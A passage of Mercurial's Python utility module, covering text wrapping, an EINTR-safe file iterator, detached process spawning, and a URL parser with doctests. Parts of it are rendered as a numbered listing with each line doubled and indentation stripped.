2220 """Check that linerange <fromline>:<toline> makes sense and return a
2220 """Check that linerange <fromline>:<toline> makes sense and return a
2221 0-based range.
2221 0-based range.
2222
2222
2223 >>> processlinerange(10, 20)
2223 >>> processlinerange(10, 20)
2224 (9, 20)
2224 (9, 20)
2225 >>> processlinerange(2, 1)
2225 >>> processlinerange(2, 1)
2226 Traceback (most recent call last):
2226 Traceback (most recent call last):
2227 ...
2227 ...
2228 ParseError: line range must be positive
2228 ParseError: line range must be positive
2229 >>> processlinerange(0, 5)
2229 >>> processlinerange(0, 5)
2230 Traceback (most recent call last):
2230 Traceback (most recent call last):
2231 ...
2231 ...
2232 ParseError: fromline must be strictly positive
2232 ParseError: fromline must be strictly positive
2233 """
2233 """
2234 if toline - fromline < 0:
2234 if toline - fromline < 0:
2235 raise error.ParseError(_("line range must be positive"))
2235 raise error.ParseError(_("line range must be positive"))
2236 if fromline < 1:
2236 if fromline < 1:
2237 raise error.ParseError(_("fromline must be strictly positive"))
2237 raise error.ParseError(_("fromline must be strictly positive"))
2238 return fromline - 1, toline
2238 return fromline - 1, toline
2239
2239
2240 bytecount = unitcountfn(
2240 bytecount = unitcountfn(
2241 (100, 1 << 30, _('%.0f GB')),
2241 (100, 1 << 30, _('%.0f GB')),
2242 (10, 1 << 30, _('%.1f GB')),
2242 (10, 1 << 30, _('%.1f GB')),
2243 (1, 1 << 30, _('%.2f GB')),
2243 (1, 1 << 30, _('%.2f GB')),
2244 (100, 1 << 20, _('%.0f MB')),
2244 (100, 1 << 20, _('%.0f MB')),
2245 (10, 1 << 20, _('%.1f MB')),
2245 (10, 1 << 20, _('%.1f MB')),
2246 (1, 1 << 20, _('%.2f MB')),
2246 (1, 1 << 20, _('%.2f MB')),
2247 (100, 1 << 10, _('%.0f KB')),
2247 (100, 1 << 10, _('%.0f KB')),
2248 (10, 1 << 10, _('%.1f KB')),
2248 (10, 1 << 10, _('%.1f KB')),
2249 (1, 1 << 10, _('%.2f KB')),
2249 (1, 1 << 10, _('%.2f KB')),
2250 (1, 1, _('%.0f bytes')),
2250 (1, 1, _('%.0f bytes')),
2251 )
2251 )
2252
2252
2253 # Matches a single EOL which can either be a CRLF where repeated CR
2253 # Matches a single EOL which can either be a CRLF where repeated CR
2254 # are removed or a LF. We do not care about old Macintosh files, so a
2254 # are removed or a LF. We do not care about old Macintosh files, so a
2255 # stray CR is an error.
2255 # stray CR is an error.
2256 _eolre = remod.compile(br'\r*\n')
2256 _eolre = remod.compile(br'\r*\n')
2257
2257
2258 def tolf(s):
2258 def tolf(s):
2259 return _eolre.sub('\n', s)
2259 return _eolre.sub('\n', s)
2260
2260
2261 def tocrlf(s):
2261 def tocrlf(s):
2262 return _eolre.sub('\r\n', s)
2262 return _eolre.sub('\r\n', s)
2263
2263
2264 if pycompat.oslinesep == '\r\n':
2264 if pycompat.oslinesep == '\r\n':
2265 tonativeeol = tocrlf
2265 tonativeeol = tocrlf
2266 fromnativeeol = tolf
2266 fromnativeeol = tolf
2267 else:
2267 else:
2268 tonativeeol = pycompat.identity
2268 tonativeeol = pycompat.identity
2269 fromnativeeol = pycompat.identity
2269 fromnativeeol = pycompat.identity
2270
2270
2271 def escapestr(s):
2271 def escapestr(s):
2272 # call underlying function of s.encode('string_escape') directly for
2272 # call underlying function of s.encode('string_escape') directly for
2273 # Python 3 compatibility
2273 # Python 3 compatibility
2274 return codecs.escape_encode(s)[0]
2274 return codecs.escape_encode(s)[0]
2275
2275
2276 def unescapestr(s):
2276 def unescapestr(s):
2277 return codecs.escape_decode(s)[0]
2277 return codecs.escape_decode(s)[0]
2278
2278
2279 def forcebytestr(obj):
2279 def forcebytestr(obj):
2280 """Portably format an arbitrary object (e.g. exception) into a byte
2280 """Portably format an arbitrary object (e.g. exception) into a byte
2281 string."""
2281 string."""
2282 try:
2282 try:
2283 return pycompat.bytestr(obj)
2283 return pycompat.bytestr(obj)
2284 except UnicodeEncodeError:
2284 except UnicodeEncodeError:
2285 # non-ascii string, may be lossy
2285 # non-ascii string, may be lossy
2286 return pycompat.bytestr(encoding.strtolocal(str(obj)))
2286 return pycompat.bytestr(encoding.strtolocal(str(obj)))
2287
2287
2288 def uirepr(s):
2288 def uirepr(s):
2289 # Avoid double backslash in Windows path repr()
2289 # Avoid double backslash in Windows path repr()
2290 return repr(s).replace('\\\\', '\\')
2290 return repr(s).replace('\\\\', '\\')
2291
2291
2292 # delay import of textwrap
2292 # delay import of textwrap
2293 def MBTextWrapper(**kwargs):
2293 def MBTextWrapper(**kwargs):
2294 class tw(textwrap.TextWrapper):
2294 class tw(textwrap.TextWrapper):
2295 """
2295 """
2296 Extend TextWrapper for width-awareness.
2296 Extend TextWrapper for width-awareness.
2297
2297
2298 Neither number of 'bytes' in any encoding nor 'characters' is
2298 Neither number of 'bytes' in any encoding nor 'characters' is
2299 appropriate to calculate terminal columns for specified string.
2299 appropriate to calculate terminal columns for specified string.
2300
2300
2301 Original TextWrapper implementation uses built-in 'len()' directly,
2301 Original TextWrapper implementation uses built-in 'len()' directly,
2302 so overriding is needed to use width information of each characters.
2302 so overriding is needed to use width information of each characters.
2303
2303
2304 In addition, characters classified into 'ambiguous' width are
2304 In addition, characters classified into 'ambiguous' width are
2305 treated as wide in East Asian area, but as narrow in other.
2305 treated as wide in East Asian area, but as narrow in other.
2306
2306
2307 This requires use decision to determine width of such characters.
2307 This requires use decision to determine width of such characters.
2308 """
2308 """
2309 def _cutdown(self, ucstr, space_left):
2309 def _cutdown(self, ucstr, space_left):
2310 l = 0
2310 l = 0
2311 colwidth = encoding.ucolwidth
2311 colwidth = encoding.ucolwidth
2312 for i in xrange(len(ucstr)):
2312 for i in xrange(len(ucstr)):
2313 l += colwidth(ucstr[i])
2313 l += colwidth(ucstr[i])
2314 if space_left < l:
2314 if space_left < l:
2315 return (ucstr[:i], ucstr[i:])
2315 return (ucstr[:i], ucstr[i:])
2316 return ucstr, ''
2316 return ucstr, ''
2317
2317
2318 # overriding of base class
2318 # overriding of base class
2319 def _handle_long_word(self, reversed_chunks, cur_line, cur_len, width):
2319 def _handle_long_word(self, reversed_chunks, cur_line, cur_len, width):
2320 space_left = max(width - cur_len, 1)
2320 space_left = max(width - cur_len, 1)
2321
2321
2322 if self.break_long_words:
2322 if self.break_long_words:
2323 cut, res = self._cutdown(reversed_chunks[-1], space_left)
2323 cut, res = self._cutdown(reversed_chunks[-1], space_left)
2324 cur_line.append(cut)
2324 cur_line.append(cut)
2325 reversed_chunks[-1] = res
2325 reversed_chunks[-1] = res
2326 elif not cur_line:
2326 elif not cur_line:
2327 cur_line.append(reversed_chunks.pop())
2327 cur_line.append(reversed_chunks.pop())
2328
2328
        # this overriding code is imported from TextWrapper of Python 2.6
        # to calculate columns of string by 'encoding.ucolwidth()'
        def _wrap_chunks(self, chunks):
            # Wrap the chunk list into a list of lines, each at most
            # self.width display columns wide.  Width is measured with
            # encoding.ucolwidth() so double-width characters count as 2.
            colwidth = encoding.ucolwidth

            lines = []
            if self.width <= 0:
                raise ValueError("invalid width %r (must be > 0)" % self.width)

            # Arrange in reverse order so items can be efficiently popped
            # from a stack of chucks.
            chunks.reverse()

            while chunks:

                # Start the list of chunks that will make up the current line.
                # cur_len is just the length of all the chunks in cur_line.
                cur_line = []
                cur_len = 0

                # Figure out which static string will prefix this line.
                if lines:
                    indent = self.subsequent_indent
                else:
                    indent = self.initial_indent

                # Maximum width for this line.
                width = self.width - len(indent)

                # First chunk on line is whitespace -- drop it, unless this
                # is the very beginning of the text (i.e. no lines started yet).
                if self.drop_whitespace and chunks[-1].strip() == r'' and lines:
                    del chunks[-1]

                while chunks:
                    l = colwidth(chunks[-1])

                    # Can at least squeeze this chunk onto the current line.
                    if cur_len + l <= width:
                        cur_line.append(chunks.pop())
                        cur_len += l

                    # Nope, this line is full.
                    else:
                        break

                # The current line is full, and the next chunk is too big to
                # fit on *any* line (not just this one).
                if chunks and colwidth(chunks[-1]) > width:
                    self._handle_long_word(chunks, cur_line, cur_len, width)

                # If the last chunk on this line is all whitespace, drop it.
                if (self.drop_whitespace and
                    cur_line and cur_line[-1].strip() == r''):
                    del cur_line[-1]

                # Convert current line back to a string and store it in list
                # of all lines (return value).
                if cur_line:
                    lines.append(indent + r''.join(cur_line))

            return lines
2391
2391
2392 global MBTextWrapper
2392 global MBTextWrapper
2393 MBTextWrapper = tw
2393 MBTextWrapper = tw
2394 return tw(**kwargs)
2394 return tw(**kwargs)
2395
2395
def wrap(line, width, initindent='', hangindent=''):
    """Wrap byte string line to at most width display columns.

    initindent prefixes the first output line, hangindent all later
    ones.  Input and output are in the local encoding; wrapping is done
    on the decoded (unicode) text so column widths are correct.
    """
    maxindent = max(len(hangindent), len(initindent))
    if width <= maxindent:
        # adjust for weird terminal size
        width = max(78, maxindent + 1)
    # decode everything once with the configured encoding/error mode
    enc = pycompat.sysstr(encoding.encoding)
    encmode = pycompat.sysstr(encoding.encodingmode)
    line = line.decode(enc, encmode)
    initindent = initindent.decode(enc, encmode)
    hangindent = hangindent.decode(enc, encmode)
    wrapper = MBTextWrapper(width=width,
                            initial_indent=initindent,
                            subsequent_indent=hangindent)
    return wrapper.fill(line).encode(enc)
2411
2411
if (pyplatform.python_implementation() == 'CPython' and
    sys.version_info < (3, 0)):
    # There is an issue in CPython that some IO methods do not handle EINTR
    # correctly. The following table shows what CPython version (and functions)
    # are affected (buggy: has the EINTR bug, okay: otherwise):
    #
    #            | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
    #   --------------------------------------------------
    #    fp.__iter__ | buggy | buggy           | okay
    #    fp.read*    | buggy | okay [1]        | okay
    #
    # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
    #
    # Here we workaround the EINTR issue for fileobj.__iter__. Other methods
    # like "read*" are ignored for now, as Python < 2.7.4 is a minority.
    #
    # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
    # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
    # CPython 2, because CPython 2 maintains an internal readahead buffer for
    # fp.__iter__ but not other fp.read* methods.
    #
    # On modern systems like Linux, the "read" syscall cannot be interrupted
    # when reading "fast" files like on-disk files. So the EINTR issue only
    # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
    # files approximately as "fast" files and use the fast (unsafe) code path,
    # to minimize the performance impact.
    if sys.version_info >= (2, 7, 4):
        # fp.readline deals with EINTR correctly, use it as a workaround.
        def _safeiterfile(fp):
            # iter() with the '' sentinel stops at EOF
            return iter(fp.readline, '')
    else:
        # fp.read* are broken too, manually deal with EINTR in a stupid way.
        # note: this may block longer than necessary because of bufsize.
        def _safeiterfile(fp, bufsize=4096):
            # Yield lines from fp, retrying raw reads interrupted by EINTR.
            fd = fp.fileno()
            line = ''
            while True:
                try:
                    buf = os.read(fd, bufsize)
                except OSError as ex:
                    # os.read only raises EINTR before any data is read
                    if ex.errno == errno.EINTR:
                        continue
                    else:
                        raise
                line += buf
                if '\n' in buf:
                    splitted = line.splitlines(True)
                    line = ''
                    for l in splitted:
                        if l[-1] == '\n':
                            yield l
                        else:
                            # keep the trailing partial line for the next read
                            line = l
                if not buf:
                    # EOF
                    break
            if line:
                # input did not end with a newline
                yield line

    def iterfile(fp):
        # Iterate over lines of fp.  The slow EINTR-safe path is used
        # only for non-regular files (pipes, sockets, ttys), where reads
        # can actually be interrupted by signals; regular on-disk files
        # take the fast path of iterating fp directly.
        fastpath = True
        if type(fp) is file:
            fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
        if fastpath:
            return fp
        else:
            return _safeiterfile(fp)
else:
    # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
    def iterfile(fp):
        return fp
2483
2483
def iterlines(iterator):
    """Yield each text line of every chunk produced by iterator."""
    for chunk in iterator:
        for ln in chunk.splitlines():
            yield ln
2488
2488
def expandpath(path):
    """Expand environment variables, then ~user references, in path."""
    withvars = os.path.expandvars(path)
    return os.path.expanduser(withvars)
2491
2491
def hgcmd():
    """Return the command used to execute current hg

    This is different from hgexecutable() because on Windows we want
    to avoid things opening new shell windows like batch files, so we
    get either the python call or current executable.
    """
    if not mainfrozen():
        return gethgcmd()
    # frozen build: point directly at the bundled executable/interpreter
    if getattr(sys, 'frozen', None) == 'macosx_app':
        # Env variable set by py2app
        return [encoding.environ['EXECUTABLEPATH']]
    return [pycompat.sysexecutable]
2506
2506
def rundetached(args, condfn):
    """Execute the argument list in a detached process.

    condfn is a callable which is called repeatedly and should return
    True once the child process is known to have started successfully.
    At this point, the child process PID is returned. If the child
    process fails to start or finishes before condfn() evaluates to
    True, return -1.
    """
    # Windows case is easier because the child process is either
    # successfully starting and validating the condition or exiting
    # on failure. We just poll on its PID. On Unix, if the child
    # process fails to start, it will be left in a zombie state until
    # the parent wait on it, which we cannot do since we expect a long
    # running process on success. Instead we listen for SIGCHLD telling
    # us our child process terminated.
    terminated = set()
    def handler(signum, frame):
        # record any reaped child; os.wait() returns a (pid, status) pair
        terminated.add(os.wait())
    prevhandler = None
    # SIGCHLD does not exist on Windows, hence the getattr guard
    SIGCHLD = getattr(signal, 'SIGCHLD', None)
    if SIGCHLD is not None:
        prevhandler = signal.signal(SIGCHLD, handler)
    try:
        pid = spawndetached(args)
        while not condfn():
            # NOTE(review): 'pid in terminated' compares a bare pid
            # against (pid, status) tuples added by handler(), so it
            # looks like it can never match; death appears to be
            # detected via testpid() instead -- confirm intended.
            # condfn() is re-checked after detecting death, in case the
            # condition was fulfilled just before the child exited.
            if ((pid in terminated or not testpid(pid))
                and not condfn()):
                return -1
            time.sleep(0.1)
        return pid
    finally:
        # restore the previous handler; only set when SIGCHLD exists
        if prevhandler is not None:
            signal.signal(signal.SIGCHLD, prevhandler)
2541
2541
def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
    """Return the result of interpolating items in the mapping into string s.

    prefix is a single character string, or a two character string with
    a backslash as the first character if the prefix needs to be escaped in
    a regular expression.

    fn is an optional function that will be applied to the replacement text
    just before replacement.

    escape_prefix is an optional flag that allows using doubled prefix for
    its escaping.
    """
    fn = fn or (lambda s: s)
    alternatives = '|'.join(mapping.keys())
    if escape_prefix:
        # let a doubled prefix stand for a literal prefix character
        alternatives += '|' + prefix
        prefix_char = prefix[1:] if len(prefix) > 1 else prefix
        mapping[prefix_char] = prefix_char
    matcher = remod.compile(r'%s(%s)' % (prefix, alternatives))
    # group()[1:] strips the single (unescaped) prefix char off the match
    return matcher.sub(lambda m: fn(mapping[m.group()[1:]]), s)
2566
2566
def getport(port):
    """Return the port for a given network service.

    If port is an integer, it's returned as is. If it's a string, it's
    looked up using socket.getservbyname(). If there's no matching
    service, error.Abort is raised.
    """
    try:
        return int(port)
    except ValueError:
        # not numeric -- fall through to a service-name lookup
        pass

    try:
        return socket.getservbyname(port)
    except socket.error:
        raise Abort(_("no port number associated with service '%s'") % port)
2583
2583
# recognized spellings of boolean configuration values
_booleans = dict.fromkeys(('1', 'yes', 'true', 'on', 'always'), True)
_booleans.update(dict.fromkeys(('0', 'no', 'false', 'off', 'never'), False))

def parsebool(s):
    """Parse s into a boolean.

    If s is not a valid boolean, returns None.
    """
    return _booleans.get(s.lower(), None)
2594
2594
# map every two-hex-digit string (all case combinations, e.g. '7f', '7F')
# to its byte character, for fast %xx unescaping
_hextochr = dict((a + b, chr(int(a + b, 16)))
                 for a in string.hexdigits for b in string.hexdigits)
2597
2597
2598 class url(object):
2598 class url(object):
2599 r"""Reliable URL parser.
2599 r"""Reliable URL parser.
2600
2600
2601 This parses URLs and provides attributes for the following
2601 This parses URLs and provides attributes for the following
2602 components:
2602 components:
2603
2603
2604 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
2604 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
2605
2605
2606 Missing components are set to None. The only exception is
2606 Missing components are set to None. The only exception is
2607 fragment, which is set to '' if present but empty.
2607 fragment, which is set to '' if present but empty.
2608
2608
2609 If parsefragment is False, fragment is included in query. If
2609 If parsefragment is False, fragment is included in query. If
2610 parsequery is False, query is included in path. If both are
2610 parsequery is False, query is included in path. If both are
2611 False, both fragment and query are included in path.
2611 False, both fragment and query are included in path.
2612
2612
2613 See http://www.ietf.org/rfc/rfc2396.txt for more information.
2613 See http://www.ietf.org/rfc/rfc2396.txt for more information.
2614
2614
2615 Note that for backward compatibility reasons, bundle URLs do not
2615 Note that for backward compatibility reasons, bundle URLs do not
2616 take host names. That means 'bundle://../' has a path of '../'.
2616 take host names. That means 'bundle://../' has a path of '../'.
2617
2617
2618 Examples:
2618 Examples:
2619
2619
2620 >>> url('http://www.ietf.org/rfc/rfc2396.txt')
2620 >>> url('http://www.ietf.org/rfc/rfc2396.txt')
2621 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
2621 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
2622 >>> url('ssh://[::1]:2200//home/joe/repo')
2622 >>> url('ssh://[::1]:2200//home/joe/repo')
2623 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
2623 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
2624 >>> url('file:///home/joe/repo')
2624 >>> url('file:///home/joe/repo')
2625 <url scheme: 'file', path: '/home/joe/repo'>
2625 <url scheme: 'file', path: '/home/joe/repo'>
2626 >>> url('file:///c:/temp/foo/')
2626 >>> url('file:///c:/temp/foo/')
2627 <url scheme: 'file', path: 'c:/temp/foo/'>
2627 <url scheme: 'file', path: 'c:/temp/foo/'>
2628 >>> url('bundle:foo')
2628 >>> url('bundle:foo')
2629 <url scheme: 'bundle', path: 'foo'>
2629 <url scheme: 'bundle', path: 'foo'>
2630 >>> url('bundle://../foo')
2630 >>> url('bundle://../foo')
2631 <url scheme: 'bundle', path: '../foo'>
2631 <url scheme: 'bundle', path: '../foo'>
2632 >>> url(r'c:\foo\bar')
2632 >>> url(r'c:\foo\bar')
2633 <url path: 'c:\\foo\\bar'>
2633 <url path: 'c:\\foo\\bar'>
2634 >>> url(r'\\blah\blah\blah')
2634 >>> url(r'\\blah\blah\blah')
2635 <url path: '\\\\blah\\blah\\blah'>
2635 <url path: '\\\\blah\\blah\\blah'>
2636 >>> url(r'\\blah\blah\blah#baz')
2636 >>> url(r'\\blah\blah\blah#baz')
2637 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
2637 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
2638 >>> url(r'file:///C:\users\me')
2638 >>> url(r'file:///C:\users\me')
2639 <url scheme: 'file', path: 'C:\\users\\me'>
2639 <url scheme: 'file', path: 'C:\\users\\me'>
2640
2640
2641 Authentication credentials:
2641 Authentication credentials:
2642
2642
2643 >>> url('ssh://joe:xyz@x/repo')
2643 >>> url('ssh://joe:xyz@x/repo')
2644 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
2644 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
2645 >>> url('ssh://joe@x/repo')
2645 >>> url('ssh://joe@x/repo')
2646 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
2646 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
2647
2647
2648 Query strings and fragments:
2648 Query strings and fragments:
2649
2649
2650 >>> url('http://host/a?b#c')
2650 >>> url('http://host/a?b#c')
2651 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
2651 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
2652 >>> url('http://host/a?b#c', parsequery=False, parsefragment=False)
2652 >>> url('http://host/a?b#c', parsequery=False, parsefragment=False)
2653 <url scheme: 'http', host: 'host', path: 'a?b#c'>
2653 <url scheme: 'http', host: 'host', path: 'a?b#c'>
2654
2654
2655 Empty path:
2655 Empty path:
2656
2656
2657 >>> url('')
2657 >>> url('')
2658 <url path: ''>
2658 <url path: ''>
2659 >>> url('#a')
2659 >>> url('#a')
2660 <url path: '', fragment: 'a'>
2660 <url path: '', fragment: 'a'>
2661 >>> url('http://host/')
2661 >>> url('http://host/')
2662 <url scheme: 'http', host: 'host', path: ''>
2662 <url scheme: 'http', host: 'host', path: ''>
2663 >>> url('http://host/#a')
2663 >>> url('http://host/#a')
2664 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
2664 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
2665
2665
2666 Only scheme:
2666 Only scheme:
2667
2667
2668 >>> url('http:')
2668 >>> url('http:')
2669 <url scheme: 'http'>
2669 <url scheme: 'http'>
2670 """
2670 """
2671
2671
2672 _safechars = "!~*'()+"
2672 _safechars = "!~*'()+"
2673 _safepchars = "/!~*'()+:\\"
2673 _safepchars = "/!~*'()+:\\"
2674 _matchscheme = remod.compile('^[a-zA-Z0-9+.\\-]+:').match
2674 _matchscheme = remod.compile('^[a-zA-Z0-9+.\\-]+:').match
2675
2675
    def __init__(self, path, parsequery=True, parsefragment=True):
        """Parse path into URL components (see the class docstring).

        parsequery/parsefragment control whether '?' and '#' are
        treated as component separators or left attached to the path.
        """
        # We slowly chomp away at path until we have only the path left
        self.scheme = self.user = self.passwd = self.host = None
        self.port = self.path = self.query = self.fragment = None
        # _localpath: no scheme parsed; path is a plain filesystem path
        self._localpath = True
        self._hostport = ''
        self._origpath = path

        if parsefragment and '#' in path:
            path, self.fragment = path.split('#', 1)

        # special case for Windows drive letters and UNC paths
        if hasdriveletter(path) or path.startswith('\\\\'):
            self.path = path
            return

        # For compatibility reasons, we can't handle bundle paths as
        # normal URLS
        if path.startswith('bundle:'):
            self.scheme = 'bundle'
            path = path[7:]
            if path.startswith('//'):
                path = path[2:]
            self.path = path
            return

        if self._matchscheme(path):
            parts = path.split(':', 1)
            if parts[0]:
                self.scheme, path = parts
                self._localpath = False

        # with no scheme, everything (or nothing) is a local path
        if not path:
            path = None
            if self._localpath:
                self.path = ''
                return
        else:
            if self._localpath:
                self.path = path
                return

        if parsequery and '?' in path:
            path, self.query = path.split('?', 1)
            if not path:
                path = None
            if not self.query:
                self.query = None

        # // is required to specify a host/authority
        if path and path.startswith('//'):
            parts = path[2:].split('/', 1)
            if len(parts) > 1:
                self.host, path = parts
            else:
                self.host = parts[0]
                path = None
            if not self.host:
                self.host = None
                # path of file:///d is /d
                # path of file:///d:/ is d:/, not /d:/
                if path and not hasdriveletter(path):
                    path = '/' + path

        # split credentials off the authority: user[:passwd]@host
        if self.host and '@' in self.host:
            self.user, self.host = self.host.rsplit('@', 1)
            if ':' in self.user:
                self.user, self.passwd = self.user.split(':', 1)
            if not self.host:
                self.host = None

        # Don't split on colons in IPv6 addresses without ports
        if (self.host and ':' in self.host and
            not (self.host.startswith('[') and self.host.endswith(']'))):
            self._hostport = self.host
            self.host, self.port = self.host.rsplit(':', 1)
            if not self.host:
                self.host = None

        if (self.host and self.scheme == 'file' and
            self.host not in ('localhost', '127.0.0.1', '[::1]')):
            raise Abort(_('file:// URLs can only refer to localhost'))

        self.path = path

        # leave the query string escaped
        for a in ('user', 'passwd', 'host', 'port',
                  'path', 'fragment'):
            v = getattr(self, a)
            if v is not None:
                setattr(self, a, urlreq.unquote(v))
2767
2767
2768 def __repr__(self):
2768 def __repr__(self):
2769 attrs = []
2769 attrs = []
2770 for a in ('scheme', 'user', 'passwd', 'host', 'port', 'path',
2770 for a in ('scheme', 'user', 'passwd', 'host', 'port', 'path',
2771 'query', 'fragment'):
2771 'query', 'fragment'):
2772 v = getattr(self, a)
2772 v = getattr(self, a)
2773 if v is not None:
2773 if v is not None:
2774 attrs.append('%s: %r' % (a, v))
2774 attrs.append('%s: %r' % (a, v))
2775 return '<url %s>' % ', '.join(attrs)
2775 return '<url %s>' % ', '.join(attrs)
2776
2776
2777 def __bytes__(self):
2777 def __bytes__(self):
2778 r"""Join the URL's components back into a URL string.
2778 r"""Join the URL's components back into a URL string.
2779
2779
2780 Examples:
2780 Examples:
2781
2781
2782 >>> str(url('http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
2782 >>> str(url('http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
2783 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
2783 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
2784 >>> str(url('http://user:pw@host:80/?foo=bar&baz=42'))
2784 >>> str(url('http://user:pw@host:80/?foo=bar&baz=42'))
2785 'http://user:pw@host:80/?foo=bar&baz=42'
2785 'http://user:pw@host:80/?foo=bar&baz=42'
2786 >>> str(url('http://user:pw@host:80/?foo=bar%3dbaz'))
2786 >>> str(url('http://user:pw@host:80/?foo=bar%3dbaz'))
2787 'http://user:pw@host:80/?foo=bar%3dbaz'
2787 'http://user:pw@host:80/?foo=bar%3dbaz'
2788 >>> str(url('ssh://user:pw@[::1]:2200//home/joe#'))
2788 >>> str(url('ssh://user:pw@[::1]:2200//home/joe#'))
2789 'ssh://user:pw@[::1]:2200//home/joe#'
2789 'ssh://user:pw@[::1]:2200//home/joe#'
2790 >>> str(url('http://localhost:80//'))
2790 >>> str(url('http://localhost:80//'))
2791 'http://localhost:80//'
2791 'http://localhost:80//'
2792 >>> str(url('http://localhost:80/'))
2792 >>> str(url('http://localhost:80/'))
2793 'http://localhost:80/'
2793 'http://localhost:80/'
2794 >>> str(url('http://localhost:80'))
2794 >>> str(url('http://localhost:80'))
2795 'http://localhost:80/'
2795 'http://localhost:80/'
2796 >>> str(url('bundle:foo'))
2796 >>> str(url('bundle:foo'))
2797 'bundle:foo'
2797 'bundle:foo'
2798 >>> str(url('bundle://../foo'))
2798 >>> str(url('bundle://../foo'))
2799 'bundle:../foo'
2799 'bundle:../foo'
2800 >>> str(url('path'))
2800 >>> str(url('path'))
2801 'path'
2801 'path'
2802 >>> str(url('file:///tmp/foo/bar'))
2802 >>> str(url('file:///tmp/foo/bar'))
2803 'file:///tmp/foo/bar'
2803 'file:///tmp/foo/bar'
2804 >>> str(url('file:///c:/tmp/foo/bar'))
2804 >>> str(url('file:///c:/tmp/foo/bar'))
2805 'file:///c:/tmp/foo/bar'
2805 'file:///c:/tmp/foo/bar'
2806 >>> print url(r'bundle:foo\bar')
2806 >>> print url(r'bundle:foo\bar')
2807 bundle:foo\bar
2807 bundle:foo\bar
2808 >>> print url(r'file:///D:\data\hg')
2808 >>> print url(r'file:///D:\data\hg')
2809 file:///D:\data\hg
2809 file:///D:\data\hg
2810 """
2810 """
2811 if self._localpath:
2811 if self._localpath:
2812 s = self.path
2812 s = self.path
2813 if self.scheme == 'bundle':
2813 if self.scheme == 'bundle':
2814 s = 'bundle:' + s
2814 s = 'bundle:' + s
2815 if self.fragment:
2815 if self.fragment:
2816 s += '#' + self.fragment
2816 s += '#' + self.fragment
2817 return s
2817 return s
2818
2818
2819 s = self.scheme + ':'
2819 s = self.scheme + ':'
2820 if self.user or self.passwd or self.host:
2820 if self.user or self.passwd or self.host:
2821 s += '//'
2821 s += '//'
2822 elif self.scheme and (not self.path or self.path.startswith('/')
2822 elif self.scheme and (not self.path or self.path.startswith('/')
2823 or hasdriveletter(self.path)):
2823 or hasdriveletter(self.path)):
2824 s += '//'
2824 s += '//'
2825 if hasdriveletter(self.path):
2825 if hasdriveletter(self.path):
2826 s += '/'
2826 s += '/'
2827 if self.user:
2827 if self.user:
2828 s += urlreq.quote(self.user, safe=self._safechars)
2828 s += urlreq.quote(self.user, safe=self._safechars)
2829 if self.passwd:
2829 if self.passwd:
2830 s += ':' + urlreq.quote(self.passwd, safe=self._safechars)
2830 s += ':' + urlreq.quote(self.passwd, safe=self._safechars)
2831 if self.user or self.passwd:
2831 if self.user or self.passwd:
2832 s += '@'
2832 s += '@'
2833 if self.host:
2833 if self.host:
2834 if not (self.host.startswith('[') and self.host.endswith(']')):
2834 if not (self.host.startswith('[') and self.host.endswith(']')):
2835 s += urlreq.quote(self.host)
2835 s += urlreq.quote(self.host)
2836 else:
2836 else:
2837 s += self.host
2837 s += self.host
2838 if self.port:
2838 if self.port:
2839 s += ':' + urlreq.quote(self.port)
2839 s += ':' + urlreq.quote(self.port)
2840 if self.host:
2840 if self.host:
2841 s += '/'
2841 s += '/'
2842 if self.path:
2842 if self.path:
2843 # TODO: similar to the query string, we should not unescape the
2843 # TODO: similar to the query string, we should not unescape the
2844 # path when we store it, the path might contain '%2f' = '/',
2844 # path when we store it, the path might contain '%2f' = '/',
2845 # which we should *not* escape.
2845 # which we should *not* escape.
2846 s += urlreq.quote(self.path, safe=self._safepchars)
2846 s += urlreq.quote(self.path, safe=self._safepchars)
2847 if self.query:
2847 if self.query:
2848 # we store the query in escaped form.
2848 # we store the query in escaped form.
2849 s += '?' + self.query
2849 s += '?' + self.query
2850 if self.fragment is not None:
2850 if self.fragment is not None:
2851 s += '#' + urlreq.quote(self.fragment, safe=self._safepchars)
2851 s += '#' + urlreq.quote(self.fragment, safe=self._safepchars)
2852 return s
2852 return s
2853
2853
2854 __str__ = encoding.strmethod(__bytes__)
2854 __str__ = encoding.strmethod(__bytes__)
2855
2855
2856 def authinfo(self):
2856 def authinfo(self):
2857 user, passwd = self.user, self.passwd
2857 user, passwd = self.user, self.passwd
2858 try:
2858 try:
2859 self.user, self.passwd = None, None
2859 self.user, self.passwd = None, None
2860 s = bytes(self)
2860 s = bytes(self)
2861 finally:
2861 finally:
2862 self.user, self.passwd = user, passwd
2862 self.user, self.passwd = user, passwd
2863 if not self.user:
2863 if not self.user:
2864 return (s, None)
2864 return (s, None)
2865 # authinfo[1] is passed to urllib2 password manager, and its
2865 # authinfo[1] is passed to urllib2 password manager, and its
2866 # URIs must not contain credentials. The host is passed in the
2866 # URIs must not contain credentials. The host is passed in the
